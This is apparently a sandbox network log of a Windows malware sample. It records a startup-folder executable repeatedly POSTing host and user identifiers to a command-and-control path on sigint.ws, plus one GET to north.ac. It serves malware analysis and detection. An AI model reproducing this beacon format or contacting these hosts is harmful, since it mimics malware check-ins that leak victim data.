                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              8 | 192.168.2.4 | 49781 | 104.21.2.205 | 80 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:54.854033947 CEST | 3197 | OUT | GET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              Jun 2, 2022 01:53:54.899542093 CEST | 3197 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 01 Jun 2022 23:53:54 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 02 Jun 2022 00:53:54 GMT
                                                                              Location: https://north.ac/760
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X2ueoCTvMjfIrkdRP1UPJ2G%2BoVOT71mmakUDu1x1e1OxhMRAH%2F%2FQqHzOmLmhs%2B3e8PKpGVyYapNLUOtQ8HOmsmIg%2FHv9FaszY3FCOb2MRxZ6n3btkxn2pPLngQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bdf15eec4e640-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              80 | 192.168.2.4 | 49854 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:47.429553032 CEST | 3471 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:47.611768961 CEST | 3471 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              81 | 192.168.2.4 | 49855 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:48.113243103 CEST | 3472 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:48.297286987 CEST | 3472 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              82 | 192.168.2.4 | 49856 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:48.512197971 CEST | 3473 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:48.693202019 CEST | 3473 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              83 | 192.168.2.4 | 49857 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:48.921276093 CEST | 3474 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.107945919 CEST | 3474 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              84 | 192.168.2.4 | 49858 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:49.360292912 CEST | 3475 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.543080091 CEST | 3475 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              85 | 192.168.2.4 | 49859 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:49.805320024 CEST | 3476 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.988356113 CEST | 3476 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              86 | 192.168.2.4 | 49860 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:50.236610889 CEST | 3477 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:50.418059111 CEST | 3477 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              87 | 192.168.2.4 | 49861 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:50.675679922 CEST | 3478 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:50.857481003 CEST | 3478 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              88 | 192.168.2.4 | 49862 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:51.108371973 CEST | 3479 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:51.285150051 CEST | 3479 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              89 | 192.168.2.4 | 49863 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:51.496356964 CEST | 3479 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:51.677273989 CEST | 3480 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              9 | 192.168.2.4 | 49783 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:53:58.462910891 CEST | 3405 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 31
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 34 32 35 36 32 30 38 38 33 33 39 32
                                                                              Data Ascii: d1=1000007001&unit=425620883392
                                                                              Jun 2, 2022 01:53:58.646670103 CEST | 3406 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              90 | 192.168.2.4 | 49864 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:51.906730890 CEST | 3480 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.089390993 CEST | 3481 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              91 | 192.168.2.4 | 49865 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:52.313960075 CEST | 3481 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.496850967 CEST | 3482 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              92 | 192.168.2.4 | 49866 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:52.699549913 CEST | 3482 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.885080099 CEST | 3483 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              93 | 192.168.2.4 | 49867 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:53.090904951 CEST | 3483 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:53.272829056 CEST | 3483 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              94 | 192.168.2.4 | 49868 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:53.522171021 CEST | 3484 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:53.703908920 CEST | 3484 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              95 | 192.168.2.4 | 49869 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:54.121448994 CEST | 3485 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:54.304692030 CEST | 3485 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              96 | 192.168.2.4 | 49870 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:54.611012936 CEST | 3486 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:54.795658112 CEST | 3486 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              97 | 192.168.2.4 | 49871 | 80.66.64.103 | 80 | C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Jun 2, 2022 01:54:55.173382044 CEST | 3487 | OUT | POST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
